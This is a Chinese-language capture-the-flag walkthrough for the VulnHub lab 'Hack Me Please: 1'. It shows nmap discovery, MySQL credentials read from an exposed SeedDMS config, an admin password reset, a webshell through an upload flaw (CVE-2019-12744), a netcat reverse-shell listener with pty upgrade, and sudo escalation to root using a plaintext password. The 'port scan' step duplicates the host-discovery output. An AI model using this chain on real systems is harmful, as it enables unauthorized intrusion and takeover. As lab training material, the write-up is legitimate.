前期环境准备
HACK ME PLEASE: 1
下载地址:
https://www.vulnhub.com/entry/hack-me-please-1%2C731/
难度:简单
信息收集
nmap
┌──(root㉿kali)-[/home/test/桌面]
└─# nmap -sP 192.168.47.0/24 --min-rate 3333
Starting Nmap 7.92 ( https://nmap.org ) at 2024-03-10 11:57 CST
Nmap scan report for 192.168.47.1
Host is up (0.00018s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.47.2
Host is up (0.000084s latency).
MAC Address: 00:50:56:EC:64:22 (VMware)
Nmap scan report for 192.168.47.175
Host is up (0.000095s latency).
MAC Address: 00:0C:29:E2:0F:D3 (VMware)
Nmap scan report for 192.168.47.254
Host is up (0.000055s latency).
MAC Address: 00:50:56:F0:D6:45 (VMware)
Nmap scan report for 192.168.47.156
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 0.36 seconds
进行端口探测,看开放了哪些端口与服务
┌──(root㉿kali)-[/home/test/桌面]
└─# nmap -sP 192.168.47.0/24 --min-rate 3333
Starting Nmap 7.92 ( https://nmap.org ) at 2024-03-10 11:57 CST
Nmap scan report for 192.168.47.1
Host is up (0.00018s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.47.2
Host is up (0.000084s latency).
MAC Address: 00:50:56:EC:64:22 (VMware)
Nmap scan report for 192.168.47.175
Host is up (0.000095s latency).
MAC Address: 00:0C:29:E2:0F:D3 (VMware)
Nmap scan report for 192.168.47.254
Host is up (0.000055s latency).
MAC Address: 00:50:56:F0:D6:45 (VMware)
Nmap scan report for 192.168.47.156
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 0.36 seconds
访问80端口
只有几个像静态页面的网站,几乎没什么功能点
在翻找源代码和js页面的时候
找到了一个类似cms的东西,还有版本号
看这个cms是否开源
获得开源源码
找到对应版本进行下载
https://sourceforge.net/projects/seeddms/files/seeddms-5.1.22/seeddms-quickstart-5.1.22.tar.gz/download
结合得到的源码找到相应的配置文件
http://192.168.47.175/seeddms51x/conf/settings.xml
mysql账号
还有个带有user的表
MySQL [seeddms]> select * from tblUsers;
+----+-------+---------------+---------------+--------------------+----------+-------+---------+------+--------+---------------------+---------------+----------+-------+------------+
| id | login | pwd | fullName | email | language | theme | comment | role | hidden | pwdExpiration | loginfailures | disabled | quota | homefolder |
+----+-------+---------------+---------------+--------------------+----------+-------+---------+------+--------+---------------------+---------------+----------+-------+------------+
| 1 | admin | md5('123456') | Administrator | address@server.com | en_GB | | | 1 | 0 | 2021-07-13 00:12:25 | 0 | 0 | 0 | NULL |
| 2 | guest | NULL | Guest User | NULL | | | | 2 | 0 | NULL | 0 | 0 | 0 | NULL |
+----+-------+---------------+---------------+--------------------+----------+-------+---------+------+--------+---------------------+---------------+----------+-------+------------+
2 rows in set (0.001 sec)
MySQL [seeddms]> update tblUsers set pwd=md5('123456') where id=1;
Query OK, 1 row affected (0.002 sec)
Rows matched: 1 Changed: 1 Warnings: 0
MySQL [seeddms]> select * from tblUsers;
+----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+---------------------+---------------+----------+-------+------------+
| id | login | pwd | fullName | email | language | theme | comment | role | hidden | pwdExpiration | loginfailures | disabled | quota | homefolder |
+----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+---------------------+---------------+----------+-------+------------+
| 1 | admin | e10adc3949ba59abbe56e057f20f883e | Administrator | address@server.com | en_GB | | | 1 | 0 | 2021-07-13 00:12:25 | 0 | 0 | 0 | NULL |
| 2 | guest | NULL | Guest User | NULL | | | | 2 | 0 | NULL | 0 | 0 | 0 | NULL |
+----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+---------------------+---------------+----------+-------+------------+
2 rows in set (0.001 sec)
MySQL [seeddms]> Ctrl-C -- exit!
Aborted
成功重置admin的密码
上传接口
找到一个上传接口
可以直接上传文件
知道这个开发语言是php语言,所以尝试上传php文件,但是这里不知道为什么只能上传1.php文件命名的,其他文件命名的都不可以。。。这里卡了好久
这里用谷歌搜索找到了文件保存的地方的位置
https://bryanleong98.medium.com/cve-2019-12744-remote-command-execution-through-unvalidated-file-upload-in-seeddms-versions-5-1-1-5c32d90fda28
getshell
找到相应的文件进行访问
可以连接上哥斯拉
当然也可以,反弹shell了现在
利用工具网站
https://forum.ywhack.com/shell.php
成功反弹shell
权限提升
┌──(root㉿kali)-[/home/test/桌面]
└─# nc -lvvp 9999
listening on [any] 9999 ...
192.168.47.175: inverse host lookup failed: Unknown host
connect to [192.168.47.156] from (UNKNOWN) [192.168.47.175] 40354
whoami
www-data
tty
not a tty
which python
which python3
/usr/bin/python3
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu:/var/www/html/seeddms51x/data/1048576/25$ su saket
su saket
Password: Saket@#$1337
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
saket@ubuntu:/var/www/html/seeddms51x/data/1048576/25$ sudo -l
sudo -l
[sudo] password for saket: Saket@#$1337
Matching Defaults entries for saket on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User saket may run the following commands on ubuntu:
(ALL : ALL) ALL
saket@ubuntu:/var/www/html/seeddms51x/data/1048576/25$ su root
su root
Password: root
su: Authentication failure
saket@ubuntu:/var/www/html/seeddms51x/data/1048576/25$ sudo -i
sudo -i
root@ubuntu:~#
本文含有隐藏内容,请 开通VIP 后查看